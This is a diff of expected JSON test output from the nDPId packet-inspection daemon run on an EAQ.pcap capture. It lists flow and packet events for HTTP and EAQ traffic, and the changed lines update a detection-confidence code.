00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820948566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948566,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAGO9OtwncwCggAAQBQ0PnHhMnaOHs2JlAS\/\/+vjAAA"} 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820948569,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948569,"pkt":"ABoRAAACABoRAAABCABFAAAoxcBAAEAGRhQKCAABrcJ3MND5AFA4ezYmx4TJ21AQOQh2hQAA"} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948836,"flow_last_seen":1432820948836,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948836,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820948836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948836,"pkt":"ABoRAAACABoRAAABCABFAAA8DwhAAEAG\/NAKCAABrcJ3GJ4TAFBXrfy9AAAAAKACOQj5jgAAAgQFtAQCCAoABPO1AAAAAAEDAwQ="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820948837,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948837,"pkt":"ABoRAAACABoRAAABCABFAAAoAAZAABAGO+etwncYCggAAQBQnhOoUgNCV638vlAS\/\/\/iigAA"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820948844,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948844,"pkt":"ABoRAAACABoRAAABCABFAAAoDwlAAEAG\/OMKCAABrcJ3GJ4TAFBXrfy+qFIDQ1AQOQipgwAA"} -00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}} +00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820949586,"flow_last_seen":1432820949586,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820949586,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432820949586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820949586,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3WwKCAAByLmKkswhF3AAGNX0AAAAAAAADdoAAUsHAACQAA=="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432820949685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820949685,"pkt":"ABoRAAACABoRAAABCABFAAAsAAxAABARDWHIuYqSCggAARdwzCEAGAX1AAAAAAAADdoAAUsHAABgAA=="} @@ -77,15 +77,15 @@ 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820970111,"flow_last_seen":1432820970111,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820970111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1432820970111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820970111,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4bIKCAAByMKGQ5x6F3AAGJpnAAAAAAAADdoADrp0AACQAA=="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432820971111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971111,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3WwKCAAByLmKkswhF3AAGNRlAAAAAQAADdsAAUyUAACQAA=="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949586,"flow_last_seen":1432820971175,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971175,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949586,"flow_last_seen":1432820971175,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971175,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432820971175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971175,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR6hwKCAAByLl94r76F3AAGJ\/qAAAAAQAADdsAAZrmAACQAA=="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949685,"flow_last_seen":1432820971265,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971265,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949685,"flow_last_seen":1432820971265,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971265,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1432820971265,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971265,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR07IKCAAByMKUQ8lxF3AAGL1RAAAAAQAADdsAAlydAACQAA=="} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949735,"flow_last_seen":1432820971335,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971335,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949735,"flow_last_seen":1432820971335,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971335,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1432820971335,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971335,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR07MKCAAByMKUQqZ8F3AAGKzSAAAAAQAADdsABZAPAACQAA=="} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950801,"flow_last_seen":1432820971405,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950801,"flow_last_seen":1432820971405,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1432820971406,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971406,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR07EKCAAByMKURKp5F3AAGJfzAAAAAQAADdsABqDuAACQAA=="} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950865,"flow_last_seen":1432820971475,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971475,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950865,"flow_last_seen":1432820971475,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971475,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432820971475,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971475,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR2rMKCAAByMKNQqHeF3AAGIJFAAAAAQAADdwAAsY8AACQAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432820972471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820972471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR2rEKCAAByMKNRId\/F3AAGLwmAAAAAQAADdwABaa1AACQAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1432820973471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820973471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3rIKCAAByMKJQ5k1F3AAGK1eAAAAAQAADdwABafIAACQAA=="} @@ -95,12 +95,12 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1432820977471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820977471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR5rMKCAAByMKBQr4aF3AAGPN5AAAAAQAADdwABkTIAACQAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1432820978471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820978471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR5rEKCAAByMKBRLpiF3AAGNEoAAAAAQAADdwABmrPAACQAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1432820979471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820979471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR47MKCAAByMKEQqvLF3AAGLWJAAAAAQAADdwABpIHAACQAA=="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957932,"flow_last_seen":1432820979565,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820979565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957932,"flow_last_seen":1432820979565,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820979565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1432820979565,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820979565,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR2rIKCAAByMKNQ72zF3AAGJmsAAAAAQAADdwABpL7AACQAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1432820980561,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820980561,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR47IKCAAByMKEQ5kRF3AAGFMTAAAAAQAADdwABwc2AACQAA=="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820958981,"flow_last_seen":1432820980615,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820980615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820958981,"flow_last_seen":1432820980615,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820980615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1432820980615,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820980615,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR47EKCAAByMKERM32F3AAGHylAAAAAQAADdwAB6i9AACQAA=="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959035,"flow_last_seen":1432820980685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820980685,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959035,"flow_last_seen":1432820980685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820980685,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1432820980685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820980685,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4rMKCAAByMKFQttAF3AAGE3SAAAAAQAADdwAB8lIAACQAA=="} 